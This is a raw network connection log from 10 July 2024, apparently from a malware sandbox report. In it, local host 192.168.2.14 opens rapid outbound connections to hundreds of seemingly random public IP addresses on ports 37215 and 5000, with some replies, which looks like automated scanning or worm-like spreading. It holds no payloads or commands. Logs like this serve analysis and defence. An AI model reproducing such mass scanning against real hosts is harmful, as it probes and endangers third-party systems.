                                                    Jul 10, 2024 08:26:11.464147091 CEST4637237215192.168.2.14197.140.67.38
                                                    Jul 10, 2024 08:26:11.464147091 CEST4808637215192.168.2.1441.117.164.47
                                                    Jul 10, 2024 08:26:11.464147091 CEST6078437215192.168.2.14157.241.125.74
                                                    Jul 10, 2024 08:26:11.464147091 CEST4708337215192.168.2.1441.164.174.129
                                                    Jul 10, 2024 08:26:11.464147091 CEST4708337215192.168.2.14157.62.109.21
                                                    Jul 10, 2024 08:26:11.464147091 CEST4708337215192.168.2.1441.166.44.7
                                                    Jul 10, 2024 08:26:11.464301109 CEST486115000192.168.2.14184.120.68.227
                                                    Jul 10, 2024 08:26:11.464301109 CEST486115000192.168.2.14184.224.82.213
                                                    Jul 10, 2024 08:26:11.464302063 CEST486115000192.168.2.14184.154.231.141
                                                    Jul 10, 2024 08:26:11.464302063 CEST486115000192.168.2.14184.214.208.104
                                                    Jul 10, 2024 08:26:11.464302063 CEST486115000192.168.2.14184.166.48.51
                                                    Jul 10, 2024 08:26:11.464302063 CEST486115000192.168.2.14184.184.109.74
                                                    Jul 10, 2024 08:26:11.464302063 CEST486115000192.168.2.14184.133.217.131
                                                    Jul 10, 2024 08:26:11.464302063 CEST459865000192.168.2.14211.91.5.102
                                                    Jul 10, 2024 08:26:11.465101004 CEST500055334211.245.64.163192.168.2.14
                                                    Jul 10, 2024 08:26:11.465111971 CEST500056340211.149.215.249192.168.2.14
                                                    Jul 10, 2024 08:26:11.465934038 CEST3721551428195.37.174.200192.168.2.14
                                                    Jul 10, 2024 08:26:11.465943098 CEST500044300211.8.93.235192.168.2.14
                                                    Jul 10, 2024 08:26:11.466420889 CEST500040814211.70.10.73192.168.2.14
                                                    Jul 10, 2024 08:26:11.466604948 CEST500040178184.17.125.233192.168.2.14
                                                    Jul 10, 2024 08:26:11.466614008 CEST3721543902221.191.119.202192.168.2.14
                                                    Jul 10, 2024 08:26:11.466916084 CEST5600637215192.168.2.14157.233.213.23
                                                    Jul 10, 2024 08:26:11.466916084 CEST3626637215192.168.2.14157.10.89.64
                                                    Jul 10, 2024 08:26:11.466916084 CEST574965000192.168.2.14211.240.86.217
                                                    Jul 10, 2024 08:26:11.466916084 CEST411045000192.168.2.14211.222.124.217
                                                    Jul 10, 2024 08:26:11.466916084 CEST448945000192.168.2.14211.6.6.56
                                                    Jul 10, 2024 08:26:11.466916084 CEST4999037215192.168.2.14197.242.248.238
                                                    Jul 10, 2024 08:26:11.466916084 CEST590965000192.168.2.14211.221.137.197
                                                    Jul 10, 2024 08:26:11.466916084 CEST5424237215192.168.2.14164.106.102.194
                                                    Jul 10, 2024 08:26:11.467092037 CEST500041900184.68.222.242192.168.2.14
                                                    Jul 10, 2024 08:26:11.467103004 CEST500037950211.172.240.96192.168.2.14
                                                    Jul 10, 2024 08:26:11.467431068 CEST500058470184.178.186.75192.168.2.14
                                                    Jul 10, 2024 08:26:11.467442036 CEST500048468184.162.78.242192.168.2.14
                                                    Jul 10, 2024 08:26:11.467449903 CEST3721536194157.118.62.90192.168.2.14
                                                    Jul 10, 2024 08:26:11.467732906 CEST486115000192.168.2.14184.130.126.217
                                                    Jul 10, 2024 08:26:11.467732906 CEST486115000192.168.2.14184.90.208.217
                                                    Jul 10, 2024 08:26:11.467732906 CEST486115000192.168.2.14184.45.24.105
                                                    Jul 10, 2024 08:26:11.467732906 CEST486115000192.168.2.14184.87.199.84
                                                    Jul 10, 2024 08:26:11.467732906 CEST486115000192.168.2.14184.61.245.139
                                                    Jul 10, 2024 08:26:11.467732906 CEST486115000192.168.2.14184.242.110.79
                                                    Jul 10, 2024 08:26:11.467732906 CEST486115000192.168.2.14184.119.238.62
                                                    Jul 10, 2024 08:26:11.467732906 CEST486115000192.168.2.14184.215.28.192
                                                    Jul 10, 2024 08:26:11.467806101 CEST500042496211.93.214.223192.168.2.14
                                                    Jul 10, 2024 08:26:11.467817068 CEST500042922211.244.158.209192.168.2.14
                                                    Jul 10, 2024 08:26:11.468121052 CEST486115000192.168.2.14184.203.79.24
                                                    Jul 10, 2024 08:26:11.468122005 CEST486115000192.168.2.14184.235.108.18
                                                    Jul 10, 2024 08:26:11.468122005 CEST486115000192.168.2.14184.104.70.252
                                                    Jul 10, 2024 08:26:11.468122005 CEST486115000192.168.2.14184.242.17.77
                                                    Jul 10, 2024 08:26:11.468122005 CEST486115000192.168.2.14184.82.207.22
                                                    Jul 10, 2024 08:26:11.468122005 CEST486115000192.168.2.14184.221.227.219
                                                    Jul 10, 2024 08:26:11.468122005 CEST486115000192.168.2.14184.129.202.75
                                                    Jul 10, 2024 08:26:11.468122005 CEST486115000192.168.2.14184.97.82.181
                                                    Jul 10, 2024 08:26:11.468141079 CEST372153909046.225.21.207192.168.2.14
                                                    Jul 10, 2024 08:26:11.468818903 CEST500036294184.87.188.175192.168.2.14
                                                    Jul 10, 2024 08:26:11.469392061 CEST4708337215192.168.2.1441.206.145.239
                                                    Jul 10, 2024 08:26:11.469392061 CEST4944037215192.168.2.14197.45.3.44
                                                    Jul 10, 2024 08:26:11.469392061 CEST4708337215192.168.2.1441.197.44.142
                                                    Jul 10, 2024 08:26:11.469392061 CEST4708337215192.168.2.1441.174.231.253
                                                    Jul 10, 2024 08:26:11.469392061 CEST4708337215192.168.2.1470.207.56.241
                                                    Jul 10, 2024 08:26:11.469392061 CEST3670837215192.168.2.14101.129.97.51
                                                    Jul 10, 2024 08:26:11.469392061 CEST4994837215192.168.2.1441.235.118.49
                                                    Jul 10, 2024 08:26:11.469392061 CEST5359837215192.168.2.14132.170.141.1
                                                    Jul 10, 2024 08:26:11.469523907 CEST344725000192.168.2.14184.23.251.218
                                                    Jul 10, 2024 08:26:11.469523907 CEST486115000192.168.2.14184.167.182.152
                                                    Jul 10, 2024 08:26:11.469523907 CEST486115000192.168.2.14184.114.183.211
                                                    Jul 10, 2024 08:26:11.469523907 CEST486115000192.168.2.14184.232.185.93
                                                    Jul 10, 2024 08:26:11.469523907 CEST486115000192.168.2.14184.111.125.208
                                                    Jul 10, 2024 08:26:11.469523907 CEST486115000192.168.2.14184.25.167.251
                                                    Jul 10, 2024 08:26:11.469525099 CEST486115000192.168.2.14184.66.188.27
                                                    Jul 10, 2024 08:26:11.469525099 CEST486115000192.168.2.14184.110.108.155
                                                    Jul 10, 2024 08:26:11.469731092 CEST500043462184.0.252.205192.168.2.14
                                                    Jul 10, 2024 08:26:11.469742060 CEST500045502184.222.131.61192.168.2.14
                                                    Jul 10, 2024 08:26:11.469750881 CEST3721560584157.243.201.47192.168.2.14
                                                    Jul 10, 2024 08:26:11.469779015 CEST359165000192.168.2.14211.72.91.0
                                                    Jul 10, 2024 08:26:11.469779015 CEST568625000192.168.2.14211.77.143.57
                                                    Jul 10, 2024 08:26:11.469779015 CEST444285000192.168.2.14211.116.83.199
                                                    Jul 10, 2024 08:26:11.469779015 CEST458765000192.168.2.14211.149.49.75
                                                    Jul 10, 2024 08:26:11.469779015 CEST401725000192.168.2.14211.109.239.189
                                                    Jul 10, 2024 08:26:11.469779015 CEST583685000192.168.2.14211.201.147.57
                                                    Jul 10, 2024 08:26:11.469779015 CEST451225000192.168.2.14211.248.86.121
                                                    Jul 10, 2024 08:26:11.469779015 CEST348025000192.168.2.14211.255.136.8
                                                    Jul 10, 2024 08:26:11.470781088 CEST500045324184.0.62.54192.168.2.14
                                                    Jul 10, 2024 08:26:11.470791101 CEST500043172184.97.194.26192.168.2.14
                                                    Jul 10, 2024 08:26:11.470944881 CEST500037972211.188.221.203192.168.2.14
                                                    Jul 10, 2024 08:26:11.471296072 CEST500038424211.176.63.233192.168.2.14
                                                    Jul 10, 2024 08:26:11.471304893 CEST372153422441.254.159.206192.168.2.14
                                                    Jul 10, 2024 08:26:11.471313953 CEST500057206184.217.99.85192.168.2.14
                                                    Jul 10, 2024 08:26:11.471678972 CEST500039558184.239.93.42192.168.2.14
                                                    Jul 10, 2024 08:26:11.471859932 CEST500054880184.72.193.234192.168.2.14
                                                    Jul 10, 2024 08:26:11.472006083 CEST500041348211.101.142.88192.168.2.14
                                                    Jul 10, 2024 08:26:11.472146988 CEST3721556006157.233.213.23192.168.2.14
                                                    Jul 10, 2024 08:26:11.472505093 CEST500051420211.22.205.247192.168.2.14
                                                    Jul 10, 2024 08:26:11.472516060 CEST500040720184.44.183.138192.168.2.14
                                                    Jul 10, 2024 08:26:11.472526073 CEST500039458184.54.207.119192.168.2.14
                                                    Jul 10, 2024 08:26:11.473002911 CEST500057312184.60.60.176192.168.2.14
                                                    Jul 10, 2024 08:26:11.473573923 CEST3599037215192.168.2.14197.215.53.253
                                                    Jul 10, 2024 08:26:11.473573923 CEST344625000192.168.2.14211.72.81.20
                                                    Jul 10, 2024 08:26:11.473573923 CEST5327837215192.168.2.1441.195.22.236
                                                    Jul 10, 2024 08:26:11.473573923 CEST4708337215192.168.2.14157.154.187.209
                                                    Jul 10, 2024 08:26:11.473573923 CEST4708337215192.168.2.14122.150.129.108
                                                    Jul 10, 2024 08:26:11.473573923 CEST4708337215192.168.2.14172.123.78.149
                                                    Jul 10, 2024 08:26:11.473573923 CEST4708337215192.168.2.14197.212.49.15
                                                    Jul 10, 2024 08:26:11.473573923 CEST4708337215192.168.2.1425.101.217.251
                                                    Jul 10, 2024 08:26:11.473993063 CEST486115000192.168.2.14184.9.164.239
                                                    Jul 10, 2024 08:26:11.473993063 CEST486115000192.168.2.14184.116.16.238
                                                    Jul 10, 2024 08:26:11.473993063 CEST486115000192.168.2.14184.151.120.165
                                                    Jul 10, 2024 08:26:11.473993063 CEST486115000192.168.2.14184.231.176.101
                                                    Jul 10, 2024 08:26:11.473993063 CEST486115000192.168.2.14184.202.144.111
                                                    Jul 10, 2024 08:26:11.473993063 CEST486115000192.168.2.14184.202.134.226
                                                    Jul 10, 2024 08:26:11.474297047 CEST3721536266157.10.89.64192.168.2.14
                                                    Jul 10, 2024 08:26:11.474531889 CEST500057776184.27.11.237192.168.2.14
                                                    Jul 10, 2024 08:26:11.474540949 CEST500051344184.157.88.71192.168.2.14
                                                    Jul 10, 2024 08:26:11.474900007 CEST500057496211.240.86.217192.168.2.14
                                                    Jul 10, 2024 08:26:11.475119114 CEST500041104211.222.124.217192.168.2.14
                                                    Jul 10, 2024 08:26:11.475127935 CEST3721549990197.242.248.238192.168.2.14
                                                    Jul 10, 2024 08:26:11.475569963 CEST500056578211.86.96.210192.168.2.14
                                                    Jul 10, 2024 08:26:11.475928068 CEST500044894211.6.6.56192.168.2.14
                                                    Jul 10, 2024 08:26:11.476092100 CEST4708337215192.168.2.14158.36.211.57
                                                    Jul 10, 2024 08:26:11.476092100 CEST5777437215192.168.2.1441.174.151.32
                                                    Jul 10, 2024 08:26:11.476092100 CEST4610837215192.168.2.14197.2.240.85
                                                    Jul 10, 2024 08:26:11.476092100 CEST4561637215192.168.2.1441.197.151.231
                                                    Jul 10, 2024 08:26:11.476092100 CEST4507837215192.168.2.14131.142.45.223
                                                    Jul 10, 2024 08:26:11.476092100 CEST4249037215192.168.2.14157.203.62.242
                                                    Jul 10, 2024 08:26:11.476092100 CEST5102037215192.168.2.1441.196.126.1
                                                    Jul 10, 2024 08:26:11.476092100 CEST4708337215192.168.2.1441.108.208.214
                                                    Jul 10, 2024 08:26:11.476151943 CEST380065000192.168.2.14211.134.171.239
                                                    Jul 10, 2024 08:26:11.476151943 CEST388105000192.168.2.14211.134.68.37
                                                    Jul 10, 2024 08:26:11.476151943 CEST3721546372197.140.67.38192.168.2.14
                                                    Jul 10, 2024 08:26:11.476151943 CEST451445000192.168.2.14211.107.33.149
                                                    Jul 10, 2024 08:26:11.476151943 CEST565245000192.168.2.14211.116.200.199
                                                    Jul 10, 2024 08:26:11.476151943 CEST609045000192.168.2.14211.203.200.213
                                                    Jul 10, 2024 08:26:11.476151943 CEST583945000192.168.2.14211.89.57.243
                                                    Jul 10, 2024 08:26:11.476151943 CEST455205000192.168.2.14211.62.105.71
                                                    Jul 10, 2024 08:26:11.476151943 CEST556285000192.168.2.14211.32.196.18
                                                    Jul 10, 2024 08:26:11.476511955 CEST500059096211.221.137.197192.168.2.14
                                                    Jul 10, 2024 08:26:11.476521969 CEST500034472184.23.251.218192.168.2.14
                                                    Jul 10, 2024 08:26:11.477060080 CEST372154808641.117.164.47192.168.2.14
                                                    Jul 10, 2024 08:26:11.477108002 CEST3721560784157.241.125.74192.168.2.14
                                                    Jul 10, 2024 08:26:11.477118015 CEST3721549440197.45.3.44192.168.2.14
                                                    Jul 10, 2024 08:26:11.479104042 CEST3721554242164.106.102.194192.168.2.14
                                                    Jul 10, 2024 08:26:11.479247093 CEST3721535990197.215.53.253192.168.2.14
                                                    Jul 10, 2024 08:26:11.479554892 CEST500035916211.72.91.0192.168.2.14
                                                    Jul 10, 2024 08:26:11.479628086 CEST486115000192.168.2.14184.242.142.248
                                                    Jul 10, 2024 08:26:11.479628086 CEST486115000192.168.2.14184.74.92.3
                                                    Jul 10, 2024 08:26:11.479628086 CEST486115000192.168.2.14184.93.228.93
                                                    Jul 10, 2024 08:26:11.479628086 CEST486115000192.168.2.14184.33.2.30
                                                    Jul 10, 2024 08:26:11.479628086 CEST486115000192.168.2.14184.58.45.242
                                                    Jul 10, 2024 08:26:11.479628086 CEST486115000192.168.2.14184.214.58.151
                                                    Jul 10, 2024 08:26:11.479628086 CEST486115000192.168.2.14184.229.42.36
                                                    Jul 10, 2024 08:26:11.479628086 CEST486115000192.168.2.14184.115.49.40
                                                    Jul 10, 2024 08:26:11.480003119 CEST4708337215192.168.2.14178.79.53.239
                                                    Jul 10, 2024 08:26:11.480003119 CEST4708337215192.168.2.1441.248.243.123
                                                    Jul 10, 2024 08:26:11.480003119 CEST4708337215192.168.2.1412.174.163.4
                                                    Jul 10, 2024 08:26:11.480003119 CEST4708337215192.168.2.1441.105.138.58
                                                    Jul 10, 2024 08:26:11.480003119 CEST4708337215192.168.2.1441.133.124.213
                                                    Jul 10, 2024 08:26:11.480003119 CEST4708337215192.168.2.14197.99.230.168
                                                    Jul 10, 2024 08:26:11.480003119 CEST4708337215192.168.2.14148.18.124.18
                                                    Jul 10, 2024 08:26:11.480003119 CEST4708337215192.168.2.14197.89.194.254
                                                    Jul 10, 2024 08:26:11.480099916 CEST500056862211.77.143.57192.168.2.14
                                                    Jul 10, 2024 08:26:11.480133057 CEST4708337215192.168.2.1441.92.18.139
                                                    Jul 10, 2024 08:26:11.480134010 CEST5713237215192.168.2.14153.104.213.89
                                                    Jul 10, 2024 08:26:11.480134010 CEST5231237215192.168.2.1441.36.102.72
                                                    Jul 10, 2024 08:26:11.480134010 CEST4281837215192.168.2.14157.160.52.78
                                                    Jul 10, 2024 08:26:11.480134010 CEST4708337215192.168.2.14157.13.244.96
                                                    Jul 10, 2024 08:26:11.480134010 CEST4708337215192.168.2.1451.248.98.35
                                                    Jul 10, 2024 08:26:11.480134010 CEST4708337215192.168.2.1441.71.67.224
                                                    Jul 10, 2024 08:26:11.480134010 CEST3321237215192.168.2.1441.236.232.103
                                                    Jul 10, 2024 08:26:11.480338097 CEST500034462211.72.81.20192.168.2.14
                                                    Jul 10, 2024 08:26:11.480566025 CEST372155327841.195.22.236192.168.2.14
                                                    Jul 10, 2024 08:26:11.480758905 CEST405805000192.168.2.14211.73.23.60
                                                    Jul 10, 2024 08:26:11.480758905 CEST474365000192.168.2.14211.200.32.188
                                                    Jul 10, 2024 08:26:11.480758905 CEST609805000192.168.2.14211.186.169.43
                                                    Jul 10, 2024 08:26:11.480758905 CEST482565000192.168.2.14211.255.136.98
                                                    Jul 10, 2024 08:26:11.480758905 CEST470465000192.168.2.14211.25.31.142
                                                    Jul 10, 2024 08:26:11.480758905 CEST592745000192.168.2.14211.106.99.113
                                                    Jul 10, 2024 08:26:11.480758905 CEST355705000192.168.2.14211.161.181.212
                                                    Jul 10, 2024 08:26:11.480935097 CEST486115000192.168.2.14184.195.194.1
                                                    Jul 10, 2024 08:26:11.480935097 CEST486115000192.168.2.14184.250.164.206
                                                    Jul 10, 2024 08:26:11.480935097 CEST486115000192.168.2.14184.167.228.176
                                                    Jul 10, 2024 08:26:11.480935097 CEST486115000192.168.2.14184.10.183.245
                                                    Jul 10, 2024 08:26:11.480935097 CEST486115000192.168.2.14184.165.103.177
                                                    Jul 10, 2024 08:26:11.480935097 CEST486115000192.168.2.14184.140.130.144
                                                    Jul 10, 2024 08:26:11.481061935 CEST486115000192.168.2.14184.8.26.35
                                                    Jul 10, 2024 08:26:11.481061935 CEST583265000192.168.2.14211.242.178.175
                                                    Jul 10, 2024 08:26:11.481061935 CEST387585000192.168.2.14211.220.194.111
                                                    Jul 10, 2024 08:26:11.481061935 CEST344365000192.168.2.14211.62.246.145
                                                    Jul 10, 2024 08:26:11.481061935 CEST442825000192.168.2.14211.137.200.168
                                                    Jul 10, 2024 08:26:11.481061935 CEST420685000192.168.2.14211.71.149.3
                                                    Jul 10, 2024 08:26:11.481061935 CEST449185000192.168.2.14211.55.32.185
                                                    Jul 10, 2024 08:26:11.481061935 CEST423805000192.168.2.14211.243.154.203
                                                    Jul 10, 2024 08:26:11.481426954 CEST500045986211.91.5.102192.168.2.14
                                                    Jul 10, 2024 08:26:11.481858015 CEST500044428211.116.83.199192.168.2.14
                                                    Jul 10, 2024 08:26:11.482420921 CEST500038006211.134.171.239192.168.2.14
                                                    Jul 10, 2024 08:26:11.482430935 CEST500045876211.149.49.75192.168.2.14
                                                    Jul 10, 2024 08:26:11.482539892 CEST372155777441.174.151.32192.168.2.14
                                                    Jul 10, 2024 08:26:11.483009100 CEST500040172211.109.239.189192.168.2.14
                                                    Jul 10, 2024 08:26:11.483544111 CEST500038810211.134.68.37192.168.2.14
                                                    Jul 10, 2024 08:26:11.484131098 CEST3721536708101.129.97.51192.168.2.14
                                                    Jul 10, 2024 08:26:11.484141111 CEST372154994841.235.118.49192.168.2.14
                                                    Jul 10, 2024 08:26:11.484474897 CEST3721546108197.2.240.85192.168.2.14
                                                    Jul 10, 2024 08:26:11.484679937 CEST500058368211.201.147.57192.168.2.14
                                                    Jul 10, 2024 08:26:11.484812021 CEST500045144211.107.33.149192.168.2.14
                                                    Jul 10, 2024 08:26:11.484822035 CEST3721553598132.170.141.1192.168.2.14
                                                    Jul 10, 2024 08:26:11.484842062 CEST5673637215192.168.2.14197.132.201.193
                                                    Jul 10, 2024 08:26:11.484842062 CEST4708337215192.168.2.14178.223.99.59
                                                    Jul 10, 2024 08:26:11.484842062 CEST4708337215192.168.2.14157.64.194.126
                                                    Jul 10, 2024 08:26:11.484842062 CEST5800837215192.168.2.145.96.24.64
                                                    Jul 10, 2024 08:26:11.484842062 CEST4708337215192.168.2.14197.197.207.64
                                                    Jul 10, 2024 08:26:11.484842062 CEST4708337215192.168.2.14157.64.188.87
                                                    Jul 10, 2024 08:26:11.484842062 CEST4272837215192.168.2.14139.13.35.184
                                                    Jul 10, 2024 08:26:11.485012054 CEST500056524211.116.200.199192.168.2.14
                                                    Jul 10, 2024 08:26:11.485034943 CEST370545000192.168.2.14211.63.100.253
                                                    Jul 10, 2024 08:26:11.485035896 CEST339865000192.168.2.14211.66.146.235
                                                    Jul 10, 2024 08:26:11.485035896 CEST542025000192.168.2.14211.69.104.173
                                                    Jul 10, 2024 08:26:11.485035896 CEST5158037215192.168.2.14219.72.118.94
                                                    Jul 10, 2024 08:26:11.485035896 CEST4487437215192.168.2.14171.128.195.137
                                                    Jul 10, 2024 08:26:11.485035896 CEST383225000192.168.2.14211.85.97.87
                                                    Jul 10, 2024 08:26:11.485035896 CEST403825000192.168.2.14211.202.247.124
                                                    Jul 10, 2024 08:26:11.485035896 CEST440285000192.168.2.14211.12.207.108
                                                    Jul 10, 2024 08:26:11.485213995 CEST500045122211.248.86.121192.168.2.14
                                                    Jul 10, 2024 08:26:11.485610008 CEST486115000192.168.2.14184.176.175.3
                                                    Jul 10, 2024 08:26:11.485610008 CEST486115000192.168.2.14184.147.160.94
                                                    Jul 10, 2024 08:26:11.485610008 CEST486115000192.168.2.14184.138.189.198
                                                    Jul 10, 2024 08:26:11.485610008 CEST416145000192.168.2.14211.32.165.175
                                                    Jul 10, 2024 08:26:11.485610008 CEST569065000192.168.2.14211.190.220.227
                                                    Jul 10, 2024 08:26:11.485610008 CEST385805000192.168.2.14211.163.223.25
                                                    Jul 10, 2024 08:26:11.485610008 CEST443045000192.168.2.14211.232.24.44
                                                    Jul 10, 2024 08:26:11.485610008 CEST426165000192.168.2.14211.6.64.246
                                                    Jul 10, 2024 08:26:11.485884905 CEST4294437215192.168.2.1441.71.63.179
                                                    Jul 10, 2024 08:26:11.485884905 CEST394265000192.168.2.14211.63.75.217
                                                    Jul 10, 2024 08:26:11.485884905 CEST481725000192.168.2.14211.2.213.10
                                                    Jul 10, 2024 08:26:11.485884905 CEST468205000192.168.2.14211.63.12.86
                                                    Jul 10, 2024 08:26:11.485884905 CEST5561837215192.168.2.14157.52.181.205
                                                    Jul 10, 2024 08:26:11.485884905 CEST3435637215192.168.2.14197.178.199.181
                                                    Jul 10, 2024 08:26:11.485884905 CEST463285000192.168.2.14211.151.115.97
                                                    Jul 10, 2024 08:26:11.485884905 CEST343885000192.168.2.14211.158.67.141
                                                    Jul 10, 2024 08:26:11.486084938 CEST500034802211.255.136.8192.168.2.14
                                                    Jul 10, 2024 08:26:11.486103058 CEST3721557132153.104.213.89192.168.2.14
                                                    Jul 10, 2024 08:26:11.486385107 CEST4708337215192.168.2.1441.241.219.108
                                                    Jul 10, 2024 08:26:11.486385107 CEST4708337215192.168.2.1441.150.129.6
                                                    Jul 10, 2024 08:26:11.486385107 CEST4708337215192.168.2.14197.220.73.104
                                                    Jul 10, 2024 08:26:11.486385107 CEST4708337215192.168.2.14197.140.110.215
                                                    Jul 10, 2024 08:26:11.486385107 CEST4942637215192.168.2.14197.99.215.32
                                                    Jul 10, 2024 08:26:11.486385107 CEST4942637215192.168.2.14197.99.215.32
                                                    Jul 10, 2024 08:26:11.486385107 CEST4942637215192.168.2.14197.99.215.32
                                                    Jul 10, 2024 08:26:11.486385107 CEST3515437215192.168.2.14111.12.69.255
                                                    Jul 10, 2024 08:26:11.486743927 CEST500060904211.203.200.213192.168.2.14
                                                    Jul 10, 2024 08:26:11.487247944 CEST372155231241.36.102.72192.168.2.14
                                                    Jul 10, 2024 08:26:11.487339020 CEST500058326211.242.178.175192.168.2.14
                                                    Jul 10, 2024 08:26:11.487972975 CEST3721542818157.160.52.78192.168.2.14
                                                    Jul 10, 2024 08:26:11.488362074 CEST4708337215192.168.2.14157.161.2.176
                                                    Jul 10, 2024 08:26:11.488362074 CEST4708337215192.168.2.14197.123.213.95
                                                    Jul 10, 2024 08:26:11.488362074 CEST4708337215192.168.2.14157.222.206.246
                                                    Jul 10, 2024 08:26:11.488362074 CEST4708337215192.168.2.14157.254.136.242
                                                    Jul 10, 2024 08:26:11.488363028 CEST4708337215192.168.2.14221.151.154.180
                                                    Jul 10, 2024 08:26:11.488363028 CEST4708337215192.168.2.14157.249.230.27
                                                    Jul 10, 2024 08:26:11.488363028 CEST4708337215192.168.2.14157.174.22.12
                                                    Jul 10, 2024 08:26:11.488363028 CEST4708337215192.168.2.14157.158.167.175
                                                    Jul 10, 2024 08:26:11.488450050 CEST496625000192.168.2.14211.216.221.135
                                                    Jul 10, 2024 08:26:11.488450050 CEST452665000192.168.2.14211.119.243.130
                                                    Jul 10, 2024 08:26:11.488450050 CEST609125000192.168.2.14211.236.199.106
                                                    Jul 10, 2024 08:26:11.488450050 CEST4708337215192.168.2.14197.213.11.17
                                                    Jul 10, 2024 08:26:11.488450050 CEST4708337215192.168.2.1441.204.250.110
                                                    Jul 10, 2024 08:26:11.488450050 CEST4708337215192.168.2.14172.221.4.247
                                                    Jul 10, 2024 08:26:11.488450050 CEST4708337215192.168.2.14157.74.178.25
                                                    Jul 10, 2024 08:26:11.488450050 CEST4708337215192.168.2.1451.98.163.128
                                                    Jul 10, 2024 08:26:11.488859892 CEST372154561641.197.151.231192.168.2.14
                                                    Jul 10, 2024 08:26:11.488871098 CEST500040580211.73.23.60192.168.2.14
                                                    Jul 10, 2024 08:26:11.489406109 CEST486115000192.168.2.14184.75.112.70
                                                    Jul 10, 2024 08:26:11.489406109 CEST582945000192.168.2.14211.31.243.23
                                                    Jul 10, 2024 08:26:11.489406109 CEST474265000192.168.2.14211.250.63.136
                                                    Jul 10, 2024 08:26:11.489406109 CEST391085000192.168.2.14211.170.38.105
                                                    Jul 10, 2024 08:26:11.489406109 CEST490025000192.168.2.14211.196.165.24
                                                    Jul 10, 2024 08:26:11.489423037 CEST500047436211.200.32.188192.168.2.14
                                                    Jul 10, 2024 08:26:11.489433050 CEST500058394211.89.57.243192.168.2.14
                                                    Jul 10, 2024 08:26:11.489593029 CEST500038758211.220.194.111192.168.2.14
                                                    Jul 10, 2024 08:26:11.489695072 CEST372153321241.236.232.103192.168.2.14
                                                    Jul 10, 2024 08:26:11.490111113 CEST500044282211.137.200.168192.168.2.14
                                                    Jul 10, 2024 08:26:11.490273952 CEST500042068211.71.149.3192.168.2.14
                                                    Jul 10, 2024 08:26:11.490330935 CEST437145000192.168.2.14211.252.231.154
                                                    Jul 10, 2024 08:26:11.490330935 CEST3289637215192.168.2.14221.104.140.125
                                                    Jul 10, 2024 08:26:11.490330935 CEST5356237215192.168.2.14172.2.237.22
                                                    Jul 10, 2024 08:26:11.490330935 CEST589005000192.168.2.14211.173.173.6
                                                    Jul 10, 2024 08:26:11.490330935 CEST537305000192.168.2.14211.33.115.237
                                                    Jul 10, 2024 08:26:11.490330935 CEST4157637215192.168.2.14197.52.39.17
                                                    Jul 10, 2024 08:26:11.490330935 CEST572025000192.168.2.14211.241.193.147
                                                    Jul 10, 2024 08:26:11.490565062 CEST3721556736197.132.201.193192.168.2.14
                                                    Jul 10, 2024 08:26:11.490736961 CEST500044918211.55.32.185192.168.2.14
                                                    Jul 10, 2024 08:26:11.491054058 CEST500042380211.243.154.203192.168.2.14
                                                    Jul 10, 2024 08:26:11.491064072 CEST500060980211.186.169.43192.168.2.14
                                                    Jul 10, 2024 08:26:11.491074085 CEST500045520211.62.105.71192.168.2.14
                                                    Jul 10, 2024 08:26:11.491348028 CEST500037054211.63.100.253192.168.2.14
                                                    Jul 10, 2024 08:26:11.491561890 CEST500033986211.66.146.235192.168.2.14
                                                    Jul 10, 2024 08:26:11.491652012 CEST5102837215192.168.2.14197.242.235.173
                                                    Jul 10, 2024 08:26:11.491652966 CEST5304437215192.168.2.1441.70.152.5
                                                    Jul 10, 2024 08:26:11.491652966 CEST5396837215192.168.2.14171.13.124.34
                                                    Jul 10, 2024 08:26:11.491652966 CEST5564637215192.168.2.14170.185.174.63
                                                    Jul 10, 2024 08:26:11.491652966 CEST4438037215192.168.2.1441.88.93.143
                                                    Jul 10, 2024 08:26:11.491652966 CEST3821637215192.168.2.14108.13.36.194
                                                    Jul 10, 2024 08:26:11.491652966 CEST3515437215192.168.2.14111.12.69.255
                                                    Jul 10, 2024 08:26:11.491652966 CEST3515437215192.168.2.14111.12.69.255
                                                    Jul 10, 2024 08:26:11.491915941 CEST500048256211.255.136.98192.168.2.14
                                                    Jul 10, 2024 08:26:11.491926908 CEST500055628211.32.196.18192.168.2.14
                                                    Jul 10, 2024 08:26:11.491935968 CEST500054202211.69.104.173192.168.2.14
                                                    Jul 10, 2024 08:26:11.492027044 CEST3721545078131.142.45.223192.168.2.14
                                                    Jul 10, 2024 08:26:11.492036104 CEST3721542490157.203.62.242192.168.2.14
                                                    Jul 10, 2024 08:26:11.492044926 CEST372154294441.71.63.179192.168.2.14
                                                    Jul 10, 2024 08:26:11.492150068 CEST500047046211.25.31.142192.168.2.14
                                                    Jul 10, 2024 08:26:11.492197990 CEST3721551580219.72.118.94192.168.2.14
                                                    Jul 10, 2024 08:26:11.493217945 CEST372155102041.196.126.1192.168.2.14
                                                    Jul 10, 2024 08:26:11.493464947 CEST4653037215192.168.2.14197.48.229.175
                                                    Jul 10, 2024 08:26:11.493464947 CEST4067637215192.168.2.1414.126.26.250
                                                    Jul 10, 2024 08:26:11.493464947 CEST4956437215192.168.2.14197.174.164.182
                                                    Jul 10, 2024 08:26:11.493464947 CEST4644037215192.168.2.14157.158.61.103
                                                    Jul 10, 2024 08:26:11.493464947 CEST410245000192.168.2.14211.7.7.172
                                                    Jul 10, 2024 08:26:11.493464947 CEST597325000192.168.2.14211.69.46.45
                                                    Jul 10, 2024 08:26:11.493464947 CEST600705000192.168.2.14211.200.32.181
                                                    Jul 10, 2024 08:26:11.493464947 CEST5488037215192.168.2.1437.145.73.193
                                                    Jul 10, 2024 08:26:11.493706942 CEST500059274211.106.99.113192.168.2.14
                                                    Jul 10, 2024 08:26:11.493716955 CEST500035570211.161.181.212192.168.2.14
                                                    Jul 10, 2024 08:26:11.494095087 CEST4087037215192.168.2.1441.122.12.150
                                                    Jul 10, 2024 08:26:11.494095087 CEST5683837215192.168.2.14197.227.245.236
                                                    Jul 10, 2024 08:26:11.494095087 CEST4418837215192.168.2.14157.249.230.27
                                                    Jul 10, 2024 08:26:11.494095087 CEST6034837215192.168.2.14157.51.240.162
                                                    Jul 10, 2024 08:26:11.494095087 CEST4327837215192.168.2.14197.180.89.15
                                                    Jul 10, 2024 08:26:11.494095087 CEST4087037215192.168.2.1441.122.12.150
                                                    Jul 10, 2024 08:26:11.494095087 CEST5683837215192.168.2.14197.227.245.236
                                                    Jul 10, 2024 08:26:11.494095087 CEST4087037215192.168.2.1441.122.12.150
                                                    Jul 10, 2024 08:26:11.494102001 CEST500039426211.63.75.217192.168.2.14
                                                    Jul 10, 2024 08:26:11.494112015 CEST500048172211.2.213.10192.168.2.14
